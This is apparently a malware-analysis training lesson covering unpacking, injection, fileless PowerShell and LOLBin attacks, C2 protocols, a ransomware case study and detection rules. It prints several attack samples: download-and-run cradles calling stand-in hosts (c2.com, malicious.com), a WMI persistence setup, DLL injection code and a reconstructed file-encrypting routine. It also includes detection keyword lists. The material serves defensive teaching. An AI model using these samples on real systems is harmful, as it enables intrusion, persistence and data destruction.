11 April 2025

Malware Analysis – Lesson 2: Advanced Techniques and Practical Examples

1. Advanced Static Analysis: Unpacking and Deobfuscation

Understanding Packers

Packers compress and encrypt executable files to evade detection and analysis. Common packers include UPX, Themida, VMProtect, and custom packers.

Identifying Packed Executables:

1. Entropy Analysis:

# Python script to calculate section entropy
import math
import pefile

def calculate_entropy(data):
    if not data:
        return 0
    entropy = 0
    for x in range(256):
        p_x = float(data.count(x)) / len(data)
        if p_x > 0:
            entropy += - p_x * math.log(p_x, 2)
    return entropy

pe = pefile.PE('packed_malware.exe')
for section in pe.sections:
    entropy = calculate_entropy(section.get_data())
    print(f"{section.Name.decode().rstrip('\x00')}: {entropy:.2f}")
  • Entropy > 7.0 often indicates compression/encryption

2. Section Characteristics:

  • Small .text section with large .data or custom sections
  • Unusual section names
  • Write + Execute permissions on sections

Manual Unpacking Techniques

Step-by-Step UPX Unpacking:

1. Load in x64dbg:

  • Open the packed executable
  • Navigate to entry point (F9 to run to entry point)

2. Find OEP (Original Entry Point):

Common techniques:
- ESP tracking method
- Jump to OEP pattern (JMP or PUSH/RET)
- Memory breakpoints on section access

3. ESP Tracking Method:

; At entry point
PUSHAD                    ; Save all registers
; ... unpacking code ...
POPAD                     ; Restore registers
JMP original_entry_point  ; Jump to OEP
  • Set hardware breakpoint on ESP access
  • Run until POPAD instruction
  • Step until JMP to OEP

4. Dumping Unpacked Code:

  • Use Scylla plugin in x64dbg
  • Dump process at OEP
  • Fix Import Address Table (IAT)

Advanced Deobfuscation

Control Flow Flattening:

Original code:

if (condition) {
    actionA();
} else {
    actionB();
}

Obfuscated:

state = 1;
while (1) {
    switch(state) {
        case 1:
            if (condition) state = 2;
            else state = 3;
            break;
        case 2:
            actionA();
            state = 4;
            break;
        case 3:
            actionB();
            state = 4;
            break;
        case 4:
            return;
    }
}

Deobfuscation Approach:

  1. Identify dispatcher loop
  2. Trace execution flow
  3. Reconstruct original control flow
  4. Use IDA Python scripts for automation

String Deobfuscation

Common String Obfuscation:

1. XOR Encryption:

# IDA Python script to decrypt XOR strings
def xor_decrypt(encrypted, key):
    decrypted = []
    for i, char in enumerate(encrypted):
        decrypted.append(chr(char ^ key[i % len(key)]))
    return ''.join(decrypted)

# Find encrypted string references
ea = idc.get_screen_ea()
encrypted_data = idc.get_bytes(ea, 50)
key = [0x41, 0x42, 0x43]  # Found through analysis
print(xor_decrypt(encrypted_data, key))

2. Stack Strings:

; Building strings on stack
mov dword ptr [esp], 'ht'
mov dword ptr [esp+2], 'tp'
mov dword ptr [esp+4], '://'
; Results in "http://"

2. Reverse Engineering Cryptographic Functions

Identifying Cryptographic Operations

Common Crypto Constants:

# AES S-box first values
AES_SBOX = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5]

# MD5 initialization values
MD5_INIT = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]

# RC4 key scheduling
RC4_PATTERN = "mov byte ptr [ecx+eax], dl"

IDA Pro FLIRT Signatures:

  • Apply crypto library signatures
  • Identify standard implementations
  • Look for custom modifications

Analyzing Custom Crypto

Step-by-Step RC4 Analysis:

1. Key Scheduling Algorithm (KSA):

// Identify this pattern in assembly
for (i = 0; i < 256; i++) {
    S[i] = i;
}
j = 0;
for (i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % keylen]) % 256;
    swap(S[i], S[j]);
}

2. Pseudo-Random Generation Algorithm (PRGA):

i = j = 0;
while (generating_output) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    swap(S[i], S[j]);
    K = S[(S[i] + S[j]) % 256];
    output = input ^ K;
}

3. Extracting Keys:

  • Set breakpoints at crypto functions
  • Dump memory containing key material
  • Trace key derivation functions

Practical Decryption Example

Ransomware Configuration Decryption:

# Found through reverse engineering
def decrypt_config(encrypted_config):
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    
    # Key found in binary at offset 0x4A300
    key = b'\x11\x22\x33\x44' * 4  # 16 bytes for AES-128
    iv = b'\x00' * 16  # Often zeros or hardcoded
    
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_config)
    
    # Remove PKCS7 padding
    config = unpad(decrypted, AES.block_size)
    return config

# Extract C2 servers from decrypted config
import json
config_data = decrypt_config(encrypted_blob)
config = json.loads(config_data)
print("C2 Servers:", config['c2_servers'])
print("Encryption Key:", config['file_encryption_key'])

3. Advanced Dynamic Analysis: Code Injection Techniques

Process Injection Methods

1. Classic DLL Injection:

// Injection code pattern
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
LPVOID pRemoteBuffer = VirtualAllocEx(hProcess, NULL, dllPathSize, 
                                     MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuffer, dllPath, dllPathSize, NULL);
HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
LPVOID pLoadLibrary = GetProcAddress(hKernel32, "LoadLibraryA");
CreateRemoteThread(hProcess, NULL, 0, pLoadLibrary, pRemoteBuffer, 0, NULL);

Monitoring with WinAPIOverride:

  1. Attach to target process
  2. Monitor for:
    • OpenProcess calls
    • VirtualAllocEx allocations
    • WriteProcessMemory operations
    • CreateRemoteThread creation

2. Process Hollowing:

; Typical hollowing sequence
CreateProcess(..., CREATE_SUSPENDED, ...)
GetThreadContext(hThread, &context)
ReadProcessMemory(...) ; Read headers
NtUnmapViewOfSection(hProcess, pImageBase)
VirtualAllocEx(hProcess, pImageBase, ...)
WriteProcessMemory(...) ; Write malicious PE
SetThreadContext(hThread, &context)
ResumeThread(hThread)

Detection in Sysmon:

<!-- Sysmon config for process hollowing detection -->
<ProcessCreate onmatch="include">
    <CommandLine condition="is">CREATE_SUSPENDED</CommandLine>
</ProcessCreate>
<ProcessAccess onmatch="include">
    <GrantedAccess>0x1F0FFF</GrantedAccess>
</ProcessAccess>

Advanced Injection Techniques

3. AtomBombing:

// Atom table injection
GlobalAddAtom(shellcode_chunk);
// Force target to access atom table
NtQueueApcThread(hThread, GlobalGetAtomName, ...)

4. SetWindowsHookEx Injection:

Monitoring approach:

# Volatility plugin to detect hooks
volatility -f memory.dmp --profile=Win10x64 messagehooks

# Check for suspicious hook procedures
volatility -f memory.dmp --profile=Win10x64 callbacks

Shellcode Analysis

Extracting Injected Code:

1. Process Memory Dump:

# Using Process Hacker
1. Right-click on process
2. Properties -> Memory
3. Find RWX regions
4. Save selected region

2. Shellcode Emulation:

# Using Unicorn Engine
from unicorn import *
from unicorn.x86_const import *

def emulate_shellcode(shellcode):
    mu = Uc(UC_ARCH_X86, UC_MODE_32)
    
    # Map memory
    mu.mem_map(0x1000000, 2 * 1024 * 1024)
    mu.mem_write(0x1000000, shellcode)
    
    # Set up stack
    mu.reg_write(UC_X86_REG_ESP, 0x1200000)
    
    # Hook API calls
    def hook_code(uc, address, size, user_data):
        print(f"Executing: 0x{address:x}")
    
    mu.hook_add(UC_HOOK_CODE, hook_code)
    
    # Start emulation
    mu.emu_start(0x1000000, 0x1000000 + len(shellcode))

4. Analyzing Fileless Malware

PowerShell-Based Threats

Deobfuscating PowerShell:

1. Common Obfuscation Patterns:

# Obfuscated
${`e`x`e`c} = &('n'+'ew-ob'+'ject') NeT.WeBcLiEnT
${d`o`w`n} = ${`e`x`e`c}."d`o`w`N`l`o`A`d`S`t`R`i`n`g"('ht'+'tp://c2.com/payload')

# Deobfuscated
$exec = New-Object Net.WebClient
$down = $exec.DownloadString('http://c2.com/payload')

2. PowerShell Logging:

# Enable transcript logging
Start-Transcript -Path "C:\Analysis\ps_log.txt" -Append

# Enable script block logging via Group Policy
Computer Configuration > Policies > Administrative Templates > 
Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging

3. Memory Analysis of PowerShell:

# Volatility command to extract PowerShell history
volatility -f memory.dmp --profile=Win10x64 consoles

# Extract .NET assemblies from memory
volatility -f memory.dmp --profile=Win10x64 dumpdotnet -D output/

WMI-Based Persistence

Detecting WMI Implants:

1. Query WMI Repository:

# List all WMI Event Filters
Get-WMIObject -Namespace root\subscription -Class __EventFilter

# List Event Consumers
Get-WMIObject -Namespace root\subscription -Class __EventConsumer

# List Bindings
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding

2. Malicious WMI Example:

# Malicious Event Filter (triggers every 60 seconds)
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
    Name = "MaliciousFilter"
    EventNameSpace = "root\cimv2"
    QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
}

# CommandLineEventConsumer (executes PowerShell)
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
    Name = "MaliciousConsumer"
    CommandLineTemplate = "powershell.exe -NoP -W Hidden -Enc <base64_payload>"
}

Living-off-the-Land Techniques

Analyzing LOLBins Usage:

1. Common LOLBins Patterns:

# Downloading with certutil
certutil.exe -urlcache -split -f http://malicious.com/payload.exe

# Execution via mshta
mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('powershell -enc <payload>'))

# DLL execution with rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("malicious_code")

2. Detection Strategy:

<!-- Sysmon rule for LOLBin detection -->
<ProcessCreate onmatch="include">
    <CommandLine condition="contains">certutil -urlcache</CommandLine>
    <CommandLine condition="contains">mshta javascript:</CommandLine>
    <CommandLine condition="contains">rundll32.exe javascript:</CommandLine>
</ProcessCreate>

5. C2 Communication Protocol Reverse Engineering

HTTP/HTTPS C2 Analysis

Dissecting C2 Protocols:

1. Custom HTTP Headers:

POST /api/beacon HTTP/1.1
Host: legitimate-site.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0)
X-Session-ID: AES256(victim_id + timestamp)
X-Request-Type: beacon
Cookie: session=BASE64(encrypted_data)

ENCRYPTED_PAYLOAD_DATA

2. Protocol Reverse Engineering Steps:

  • Capture multiple communication sessions
  • Identify patterns in headers/data
  • Correlate with binary analysis
  • Decrypt/decode payloads

DNS Tunneling Analysis

Identifying DNS C2:

1. Suspicious DNS Patterns:

# Wireshark display filter
dns.qry.name matches "^[a-f0-9]{32}\." and dns.qry.type == 1

# Example DNS tunneling query
# 61626364656667686970717273747576.malicious-c2.com
# Decoded: "abcdefghipqrstuv" (data exfiltration)

2. Decoding DNS Tunneling:

import base64
import struct

def decode_dns_tunnel(queries):
    data = b''
    for query in queries:
        subdomain = query.split('.')[0]
        # Common encoding: hex
        chunk = bytes.fromhex(subdomain)
        data += chunk
    
    # May need additional decoding
    return decompress(decrypt(data))

Custom Binary Protocols

Reverse Engineering Binary C2:

1. Protocol Structure Analysis:

struct C2_Packet {
    uint32_t magic;          // 0xDEADBEEF
    uint16_t packet_type;    // Command type
    uint16_t packet_length;  // Data length
    uint32_t session_id;     // Victim identifier
    uint8_t encrypted_data[]; // AES encrypted payload
};

2. Creating Protocol Dissector:

-- Wireshark Lua dissector
local c2_proto = Proto("c2", "Custom C2 Protocol")

local f_magic = ProtoField.uint32("c2.magic", "Magic", base.HEX)
local f_type = ProtoField.uint16("c2.type", "Type", base.DEC)
local f_length = ProtoField.uint16("c2.length", "Length", base.DEC)
local f_session = ProtoField.uint32("c2.session", "Session ID", base.HEX)

c2_proto.fields = {f_magic, f_type, f_length, f_session}

function c2_proto.dissector(buffer, pinfo, tree)
    pinfo.cols.protocol = "C2"
    local subtree = tree:add(c2_proto, buffer(), "C2 Protocol")
    
    subtree:add(f_magic, buffer(0,4))
    subtree:add(f_type, buffer(4,2))
    subtree:add(f_length, buffer(6,2))
    subtree:add(f_session, buffer(8,4))
end

tcp_table = DissectorTable.get("tcp.port")
tcp_table:add(8443, c2_proto)

6. Practical Case Study: Ransomware Analysis

Initial Triage

Sample: CryptoLocker Variant

1. Static Properties:

SHA256: a1b2c3d4e5f6789...
File Type: PE32 executable
Compile Time: 2024-01-15 08:30:00
Packer: UPX 3.96

2. Behavioral Summary:

  • Terminates shadow copies
  • Encrypts files with .locked extension
  • Drops ransom note: DECRYPT_INSTRUCTIONS.txt
  • Communicates with Tor hidden service

Detailed Analysis Workflow

Step 1: Unpacking

; UPX unpacking at OEP
0x00401000: PUSHAD
0x00401001: MOV ESI, 0x00409000  ; Packed data
0x00401006: MOV EDI, 0x00401000  ; Destination
...
0x00401150: POPAD
0x00401151: JMP 0x004A5000       ; Original Entry Point

Step 2: Encryption Routine Analysis

// Reconstructed from assembly
void encrypt_file(char* filename) {
    FILE* file = fopen(filename, "rb");
    if (!file) return;
    
    // Generate unique file key
    unsigned char file_key[32];
    CryptGenRandom(hProv, 32, file_key);
    
    // Encrypt file key with RSA public key
    unsigned char encrypted_key[256];
    RSA_public_encrypt(32, file_key, encrypted_key, rsa_public, RSA_PKCS1_OAEP_PADDING);
    
    // Read file content
    fseek(file, 0, SEEK_END);
    long file_size = ftell(file);
    fseek(file, 0, SEEK_SET);
    
    unsigned char* buffer = malloc(file_size);
    fread(buffer, 1, file_size, file);
    fclose(file);
    
    // AES-256 CBC encryption
    AES_KEY aes_key;
    AES_set_encrypt_key(file_key, 256, &aes_key);
    
    unsigned char iv[16] = {0};
    AES_cbc_encrypt(buffer, buffer, file_size, &aes_key, iv, AES_ENCRYPT);
    
    // Write encrypted file
    char new_filename[MAX_PATH];
    sprintf(new_filename, "%s.locked", filename);
    file = fopen(new_filename, "wb");
    
    // File structure: [RSA_encrypted_key][AES_encrypted_data]
    fwrite(encrypted_key, 1, 256, file);
    fwrite(buffer, 1, file_size, file);
    fclose(file);
    
    // Delete original
    DeleteFile(filename);
}

Step 3: Kill Switch Discovery

# IDA Python script to find kill switch
import idaapi
import idc

# Search for mutex creation
mutex_refs = []
for addr in idautils.XrefsTo(idc.get_name_ea_simple("CreateMutexW")):
    mutex_refs.append(addr.frm)

# Analyze mutex names
for ref in mutex_refs:
    # Trace back to find mutex name
    mutex_name_addr = idc.get_operand_value(ref - 0x10, 1)
    mutex_name = idc.get_strlit_contents(mutex_name_addr, -1, idc.STRTYPE_UNICODE)
    print(f"Mutex: {mutex_name}")
    
# Found: Global\MsCryptoLockerKillSwitch2024

Step 4: C2 Communication

# Extracted Tor configuration
TOR_HIDDEN_SERVICE = "cryptolocker2024xxxxxxxxx.onion"
BITCOIN_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"

# Communication protocol
def send_infection_report(victim_id, encrypted_files_count):
    data = {
        "victim_id": victim_id,
        "timestamp": time.time(),
        "files_encrypted": encrypted_files_count,
        "bitcoin_address": BITCOIN_ADDRESS,
        "system_info": get_system_info()
    }
    
    # Send via Tor
    session = requests.Session()
    session.proxies = {'http': 'socks5h://localhost:9050',
                      'https': 'socks5h://localhost:9050'}
    
    response = session.post(f"http://{TOR_HIDDEN_SERVICE}/report",
                          json=data, timeout=30)

Recovery and Mitigation

File Recovery Attempts:

1. Check for Encryption Flaws:

# Analyze encryption implementation
# Found: IV reuse vulnerability in early versions
def attempt_recovery(encrypted_file):
    # If same IV used for multiple files
    # Known plaintext attack possible
    pass

2. Shadow Copy Recovery:

vssadmin list shadows
# If ransomware failed to delete all shadows
mklink /d C:\ShadowRestore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

7. Automated Analysis Pipeline Development

Building an Analysis Framework

Architecture Overview:

# analysis_pipeline.py
import os
import hashlib
import subprocess
import json
from datetime import datetime

class MalwareAnalysisPipeline:
    def __init__(self, sample_path):
        self.sample_path = sample_path
        self.sample_hash = self.calculate_hash()
        self.results = {
            "hash": self.sample_hash,
            "timestamp": datetime.now().isoformat(),
            "static_analysis": {},
            "dynamic_analysis": {},
            "network_analysis": {},
            "verdict": "unknown"
        }
    
    def calculate_hash(self):
        sha256_hash = hashlib.sha256()
        with open(self.sample_path, "rb") as f:
            for byte_block in iter(lambda: f.read(4096), b""):
                sha256_hash.update(byte_block)
        return sha256_hash.hexdigest()
    
    def run_static_analysis(self):
        # PE analysis
        pe_info = self.analyze_pe_structure()
        self.results["static_analysis"]["pe_info"] = pe_info
        
        # String extraction
        strings = self.extract_strings()
        self.results["static_analysis"]["strings"] = strings
        
        # YARA scanning
        yara_matches = self.run_yara_rules()
        self.results["static_analysis"]["yara_matches"] = yara_matches
        
    def run_dynamic_analysis(self):
        # Sandbox execution
        sandbox_report = self.execute_in_sandbox()
        self.results["dynamic_analysis"] = sandbox_report
        
    def analyze_pe_structure(self):
        # Using pefile
        import pefile
        pe = pefile.PE(self.sample_path)
        
        return {
            "imphash": pe.get_imphash(),
            "compile_time": datetime.fromtimestamp(pe.FILE_HEADER.TimeDateStamp).isoformat(),
            "sections": [
                {
                    "name": section.Name.decode().rstrip('\x00'),
                    "virtual_size": section.Misc_VirtualSize,
                    "raw_size": section.SizeOfRawData,
                    "entropy": section.get_entropy()
                }
                for section in pe.sections
            ],
            "imports": self.extract_imports(pe)
        }
    
    def execute_in_sandbox(self):
        # Cuckoo Sandbox integration
        cmd = ["cuckoo", "submit", "--file", self.sample_path]
        result = subprocess.run(cmd, capture_output=True, text=True)
        task_id = json.loads(result.stdout)["task_id"]
        
        # Wait for analysis completion
        # ... (implement polling logic)
        
        # Retrieve report
        report_cmd = ["cuckoo", "report", str(task_id)]
        report = subprocess.run(report_cmd, capture_output=True, text=True)
        return json.loads(report.stdout)

Integration with Threat Intelligence

Threat Intel Enrichment:

class ThreatIntelligence:
    def __init__(self, api_keys):
        self.vt_api_key = api_keys.get('virustotal')
        self.otx_api_key = api_keys.get('alienvault_otx')
        self.misp_url = api_keys.get('misp_url')
        self.misp_key = api_keys.get('misp_key')
    
    def check_virustotal(self, file_hash):
        import requests
        headers = {"x-apikey": self.vt_api_key}
        url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
        
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            data = response.json()
            return {
                "detections": data["data"]["attributes"]["last_analysis_stats"],
                "names": data["data"]["attributes"]["names"],
                "first_seen": data["data"]["attributes"]["first_submission_date"]
            }
        return None
    
    def check_otx_pulses(self, indicator):
        from OTXv2 import OTXv2
        otx = OTXv2(self.otx_api_key)
        
        pulses = otx.get_indicator_details_full(indicator_type='file', 
                                               indicator=indicator)
        return {
            "pulse_count": len(pulses["general"]["pulse_info"]["pulses"]),
            "pulses": pulses["general"]["pulse_info"]["pulses"][:5]  # Top 5
        }
    
    def submit_to_misp(self, analysis_results):
        from pymisp import PyMISP, MISPEvent, MISPObject
        
        misp = PyMISP(self.misp_url, self.misp_key)
        event = MISPEvent()
        event.info = f"Automated Analysis: {analysis_results['hash']}"
        event.threat_level_id = 2  # Medium
        event.analysis = 2  # Completed
        
        # Add file object
        file_obj = MISPObject('file')
        file_obj.add_attribute('sha256', value=analysis_results['hash'])
        file_obj.add_attribute('filename', value=analysis_results.get('filename', 'unknown'))
        
        # Add network indicators
        for domain in analysis_results.get('contacted_domains', []):
            event.add_attribute('domain', domain)
        
        event.add_object(file_obj)
        result = misp.add_event(event)
        return result

Automated Reporting

Report Generation:

from jinja2 import Template
import pdfkit

class ReportGenerator:
    def __init__(self, template_path):
        with open(template_path, 'r') as f:
            self.template = Template(f.read())
    
    def generate_html_report(self, analysis_results):
        html_content = self.template.render(
            sample=analysis_results,
            timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
            analyst="Automated Analysis System"
        )
        return html_content
    
    def generate_pdf_report(self, analysis_results, output_path):
        html_content = self.generate_html_report(analysis_results)
        
        options = {
            'page-size': 'A4',
            'margin-top': '0.75in',
            'margin-right': '0.75in',
            'margin-bottom': '0.75in',
            'margin-left': '0.75in',
            'encoding': "UTF-8",
            'no-outline': None
        }
        
        pdfkit.from_string(html_content, output_path, options=options)

8. Advanced Persistence Mechanism Analysis

Registry Persistence

Common Registry Locations:

# Registry monitoring script
import winreg

PERSISTENCE_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce"),
    # Image File Execution Options (IFEO)
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"),
    # AppInit_DLLs
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"),
    # Winlogon
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"),
]

def scan_persistence_registry():
    findings = []
    
    for hive, key_path in PERSISTENCE_KEYS:
        try:
            key = winreg.OpenKey(hive, key_path, 0, winreg.KEY_READ)
            
            i = 0
            while True:
                try:
                    name, value, type = winreg.EnumValue(key, i)
                    findings.append({
                        "hive": hive,
                        "key": key_path,
                        "name": name,
                        "value": value,
                        "suspicious": analyze_suspicious_entry(name, value)
                    })
                    i += 1
                except WindowsError:
                    break
                    
            winreg.CloseKey(key)
        except Exception as e:
            continue
    
    return findings

def analyze_suspicious_entry(name, value):
    suspicious_indicators = [
        "powershell",
        "cmd.exe /c",
        "wscript",
        "mshta",
        "rundll32",
        "regsvr32",
        "-enc",
        "-nop",
        "-w hidden",
        "http://",
        "https://",
        ".ps1",
        ".vbs",
        ".js"
    ]
    
    value_lower = value.lower()
    return any(indicator in value_lower for indicator in suspicious_indicators)

Scheduled Task Persistence

Analyzing Scheduled Tasks:

# PowerShell script to examine scheduled tasks
$suspiciousTasks = Get-ScheduledTask | Where-Object {
    $_.Actions.Execute -match 'powershell|cmd|wscript|mshta|rundll32' -or
    $_.Actions.Arguments -match '-enc|-nop|hidden|http'
} | Select-Object TaskName, TaskPath, State, Author, Date, Actions

# Export detailed task information
foreach ($task in $suspiciousTasks) {
    $taskInfo = Get-ScheduledTaskInfo -TaskName $task.TaskName
    $task | Add-Member -NotePropertyName LastRunTime -NotePropertyValue $taskInfo.LastRunTime
    $task | Add-Member -NotePropertyName NextRunTime -NotePropertyValue $taskInfo.NextRunTime
    
    # Export task XML for analysis
    Export-ScheduledTask -TaskName $task.TaskName | 
        Out-File "C:\Analysis\Tasks\$($task.TaskName).xml"
}

Service-Based Persistence

Service Analysis:

import wmi
import subprocess

def analyze_services():
    c = wmi.WMI()
    suspicious_services = []
    
    for service in c.Win32_Service():
        # Check for suspicious characteristics
        if any([
            not service.PathName,
            service.PathName and 'temp' in service.PathName.lower(),
            service.PathName and 'appdata' in service.PathName.lower(),
            service.PathName and any(sus in service.PathName.lower() 
                for sus in ['powershell', 'cmd.exe', 'wscript']),
            service.StartName and service.StartName.lower() not in 
                ['localsystem', 'nt authority\\system', 'nt authority\\localservice', 
                 'nt authority\\networkservice']
        ]):
            suspicious_services.append({
                'name': service.Name,
                'display_name': service.DisplayName,
                'path': service.PathName,
                'start_type': service.StartMode,
                'account': service.StartName,
                'state': service.State,
                'description': service.Description
            })
    
    return suspicious_services

# Check for service DLL hijacking
def check_service_dll_hijacking():
    # Query services that load DLLs
    output = subprocess.check_output([
        'wmic', 'service', 'where', 
        "PathName like '%svchost.exe%'", 
        'get', 'Name,PathName,ProcessId'
    ], text=True)
    
    # Check each svchost service's loaded DLLs
    # ... (implementation details)

9. Mobile Malware Analysis Fundamentals

Android Malware Analysis

Setting Up Android Analysis Environment:

1. Android Virtual Device (AVD):

# Create AVD with Google APIs (for Play Services)
avdmanager create avd -n malware_analysis -k "system-images;android-29;google_apis;x86"

# Start emulator with writable system
emulator -avd malware_analysis -writable-system -no-snapshot

2. Essential Tools:

  • jadx: DEX to Java decompiler
  • apktool: APK reverse engineering
  • Frida: Dynamic instrumentation
  • MobSF: Mobile Security Framework

Static Analysis Workflow:

# Extract APK contents
apktool d malicious.apk -o malicious_decoded/

# Examine AndroidManifest.xml
cat malicious_decoded/AndroidManifest.xml | grep -E "permission|service|receiver"

# Decompile to Java
jadx malicious.apk -d jadx_output/

# Search for suspicious patterns
grep -r "exec\|Runtime\|ProcessBuilder" jadx_output/
grep -r "DexClassLoader\|PathClassLoader" jadx_output/
grep -r "android.permission.SEND_SMS" jadx_output/

Dynamic Analysis with Frida:

// Frida script to monitor sensitive API calls
Java.perform(function() {
    // Monitor SMS sending
    var SmsManager = Java.use('android.telephony.SmsManager');
    SmsManager.sendTextMessage.implementation = function(dest, sc, text, pi, di) {
        console.log('[SMS] Destination: ' + dest);
        console.log('[SMS] Text: ' + text);
        // Call original method
        return this.sendTextMessage(dest, sc, text, pi, di);
    };
    
    // Monitor file access
    var File = Java.use('java.io.File');
    File.$init.overload('java.lang.String').implementation = function(path) {
        console.log('[File] Accessing: ' + path);
        return this.$init(path);
    };
    
    // Monitor network connections
    var URL = Java.use('java.net.URL');
    URL.openConnection.implementation = function() {
        console.log('[Network] Connecting to: ' + this.toString());
        return this.openConnection();
    };
});

iOS Malware Analysis

Jailbroken Device Setup:

1. Essential Cydia Tools:

  • Frida
  • SSL Kill Switch 2
  • dumpdecrypted
  • class-dump

2. Binary Analysis:

# Decrypt IPA
./dumpdecrypted.dylib MaliciousApp

# Extract class information
class-dump -H MaliciousApp -o headers/

# Check for suspicious frameworks
otool -L MaliciousApp | grep -v "/System"

10. Threat Hunting with Analysis Results

Creating Detection Rules

Sigma Rules from Analysis:

title: Ransomware File Encryption Activity
id: a1b2c3d4-5678-9012-3456-789012345678
status: experimental
description: Detects mass file encryption typical of ransomware
author: Security Analyst
date: 2024/01/01
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 11  # File creation
        TargetFilename|endswith:
            - '.locked'
            - '.encrypted'
            - '.crypto'
    timeframe: 10s
    condition: selection | count() > 100
falsepositives:
    - Legitimate encryption software
level: high

Converting to YARA:

rule Ransomware_Encryption_Routine {
    meta:
        description = "Detects ransomware encryption functions"
        author = "Analysis Team"
        date = "2024-01-01"
        
    strings:
        $api1 = "CryptGenRandom"
        $api2 = "CryptEncrypt"
        $api3 = "CryptAcquireContext"
        $str1 = "Your files have been encrypted"
        $str2 = ".locked"
        $pattern = {48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0}
        
    condition:
        uint16(0) == 0x5A4D and
        all of ($api*) and
        any of ($str*) and
        $pattern
}

Threat Hunting Queries

KQL Queries for Threat Hunting:

// Process injection detection
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("notepad.exe", "calc.exe", "svchost.exe")
| where InitiatingProcessFileName !in~ ("services.exe", "winlogon.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, 
         InitiatingProcessFileName, InitiatingProcessCommandLine
| where ProcessCommandLine contains "powershell" or 
        ProcessCommandLine contains "cmd"

// Suspicious PowerShell execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "powershell.exe"
| where ProcessCommandLine contains "-enc" or 
        ProcessCommandLine contains "-nop" or
        ProcessCommandLine contains "-w hidden"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName
| summarize Count = count() by DeviceName, bin(Timestamp, 1h)
| where Count > 10

Incident Response Integration

Automated Response Playbook:

class IncidentResponseAutomation:
    def __init__(self, analysis_results):
        self.results = analysis_results
        self.ioc_list = self.extract_iocs()
        
    def extract_iocs(self):
        iocs = {
            'file_hashes': [],
            'domains': [],
            'ip_addresses': [],
            'file_paths': [],
            'registry_keys': [],
            'mutexes': []
        }
        
        # Extract from analysis results
        # ... (parsing logic)
        
        return iocs
    
    def block_network_iocs(self):
        # Update firewall rules
        for domain in self.ioc_list['domains']:
            subprocess.run(['netsh', 'advfirewall', 'firewall', 'add', 'rule',
                          f'name="Block {domain}"', 'dir=out', 'action=block',
                          f'remoteip={domain}'])
        
        # Update DNS blackhole
        with open('/etc/bind/blackhole.conf', 'a') as f:
            for domain in self.ioc_list['domains']:
                f.write(f'zone "{domain}" {{ type master; file "/etc/bind/db.blackhole"; }};\n')
    
    def deploy_yara_rules(self):
        # Generate YARA rule from analysis
        rule = self.generate_yara_rule()
        
        # Deploy to endpoints
        # ... (deployment logic)
    
    def create_investigation_timeline(self):
        timeline = []
        
        # Process creation events
        for event in self.results.get('process_events', []):
            timeline.append({
                'timestamp': event['timestamp'],
                'type': 'process_creation',
                'details': event
            })
        
        # Network events
        for event in self.results.get('network_events', []):
            timeline.append({
                'timestamp': event['timestamp'],
                'type': 'network_connection',
                'details': event
            })
        
        # Sort by timestamp
        timeline.sort(key=lambda x: x['timestamp'])
        
        return timeline

This lesson has covered advanced malware analysis techniques including:

  1. Advanced unpacking and deobfuscation methods
  2. Cryptographic function reverse engineering
  3. Sophisticated injection technique analysis
  4. Fileless malware investigation
  5. C2 protocol reverse engineering
  6. Practical ransomware case study
  7. Automation pipeline development
  8. Persistence mechanism analysis
  9. Mobile malware fundamentals
  10. Threat hunting integration

These techniques build upon the fundamentals from Lesson 1, providing security professionals with practical skills for analyzing sophisticated threats. Remember that malware analysis is an evolving field, continually update your skills and tools to keep pace with emerging threats.

Key Takeaways

  1. Automation is Essential: Build repeatable processes to handle the volume of threats
  2. Context Matters: Understanding the full attack chain is more valuable than isolated IOCs
  3. Share Intelligence: Contributing to the security community strengthens collective defense
  4. Continuous Learning: New techniques emerge constantly - stay current with research

What's next?

  • Practice with malware analysis challenges and CTFs
